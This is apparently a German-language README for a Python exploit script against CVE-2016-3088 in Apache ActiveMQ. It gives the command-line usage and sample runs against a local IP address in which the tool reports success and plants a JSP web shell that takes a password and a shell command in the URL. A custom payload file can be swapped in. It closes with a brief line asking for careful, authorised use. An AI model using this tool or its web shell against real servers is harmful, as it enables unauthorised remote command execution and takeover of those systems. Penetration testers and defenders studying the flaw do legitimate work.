
Ein Python-basiertes Exploit-Skript für CVE-2016-3088
Ein Python-basiertes Exploit-Skript für CVE-2016-3088.
Dies ist mein erstes Skript, daher passt vielleicht etwas nicht ganz.
Aber beim Testen schien es zu funktionieren.
Dieses Skript kann die Notwendigkeit beseitigen, während der Penetration von CVE-2016-3088 Pakete zu erfassen,
sodass wir die Datei direkt schreiben und verschieben können.
python CVE-2016-3088.py --url http://ip:port/ [--path absolute_path] [--script filename.txt]
Der Parameter --script ist optional; wenn Sie das Programm ohne ihn ausführen, wird der integrierte Payload verwendet,
der Payload erlaubt nur die Ausführung einiger weniger Befehle in der URL.
Sie können jedoch andere Skripte eingeben, um Ihr Ziel zu erreichen.
Laden Sie einfach die .py-Datei herunter.
Und es erfordert einige Module.
$ python CVE-2016-3088.py --url http://192.168.244.153:8161/ --path /opt/activemq
[+] The target is Vulnerable
[+] Exploiting...
[+] Successful!
[+] Visit The JSP file: http://192.168.244.153:8161/admin/d404ca6ffa5849a9ab1202dd388684f5.jsp?pwd=023&i=[Your-Command]
$ python CVE-2016-3088.py --url http://192.168.244.153:8161/ --path /opt/activemq --script script.txt
[+] The target is Vulnerable
[+] Exploiting...
[+] Successful!
[+] Visit The JSP file: http://192.168.244.153:8161/admin/6655d82d47cd43bb8a21515f476bce1f.jsp
Bitte verwenden Sie dieses Tool mit Vorsicht und nur mit Autorisierung!